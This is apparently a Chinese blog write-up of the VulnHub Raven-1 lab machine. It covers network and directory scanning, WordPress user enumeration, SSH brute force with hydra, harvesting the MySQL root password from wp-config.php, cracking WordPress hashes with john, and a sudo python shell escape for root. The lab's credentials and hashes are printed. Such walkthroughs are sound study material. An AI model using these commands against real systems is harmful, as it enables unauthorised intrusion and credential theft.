Vulhub靶场之raven

vulhub靶场学习之raven

环境准备

raven靶场下载

下载链接https://www.vulnhub.com/entry/raven-1,256/
在这里插入图片描述

下载完成后,使用VMware导入镜像启动
在这里插入图片描述

kali和raven都选择nat模式启动

1.信息收集

靶机ip收集

使用kali自带工具arp-scan扫描ip

什么是arp

地址解析协议(Address Resolution Protocol),其基本功能为透过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。它是IPv4中网络层必不可少的协议,是根据IP地址获得物理地址MAC的一个TCP/IP协议。通过ARP,在局域网可以很容易构成一个ARP欺骗,从而得到有用数据信息。

arp-scan -l

-l 从网络接口配置生成地址

在这里插入图片描述

得到靶机ip后

进行nmap端口扫描

在这里插入图片描述

扫描得知靶机22,80,111端口开启,浏览器访问靶机
在这里插入图片描述

dirb扫描靶机网站

dirb http://192.168.30.140
在这里插入图片描述

可以看到有wordpress网站, 看到wordpress网站后台登录到入口
在这里插入图片描述

点击log in发现无法访问,网上搜索了一下得知解析有问题,需要在hosts配置下
在这里插入图片描述

能正常访问
在这里插入图片描述

因为探测到wordpress,所以直接上wordpress漏洞探测工具,这里使用kali自带的WPscan, 先暴力枚举用户名

wpscan --url http://$ip/wordpress/ -eu
在这里插入图片描述

收集到steven和michael两个用户,存到user.txt文件中

使用hydra工具暴力破解密码

cp /usr/share/wordlists/rockyou.txt pass

hydra -L user.txt -P pass 192.168.30.140 ssh

这里我使用的是新版kali,rockyou.txt文件需要解压

使用gzip -d解压就行

获取到ssh登录到用户密码:michael

ssh连上,开始后续利用

查看靶机是否运行MySQL服务

在这里插入图片描述

切换到wordpress目录,发现config配置文件,可能存在用户密码

在这里插入图片描述

查看config文件,发现了数据库的用户密码

用户密码为:root、R@v3nSecurity

cat wp-config.php
在这里插入图片描述

用刚才收集到的数据库用户密码登录mysql

mysql -u root -p

R@v3nSecurity

show databases;

use wordpress;

show tables;

select * from wp_users;

在这里插入图片描述

发现两组用户密码

michael :$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
john解码,最后得到steven:pink84

把密码放入文件swn里面通过john解码

vim swn.txt

cat swn.txt

john swn.txt --wordlist=/usr/share/wordlists/rockyou.txt
在这里插入图片描述

提权

使用steven用户远程登录ssh

ssh steven@192.168.30.140

pink84

在这里插入图片描述

利用优化命令执行终端的命令提权

sudo python -c ‘import pty; pty.spawn(“/bin/bash”);’

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值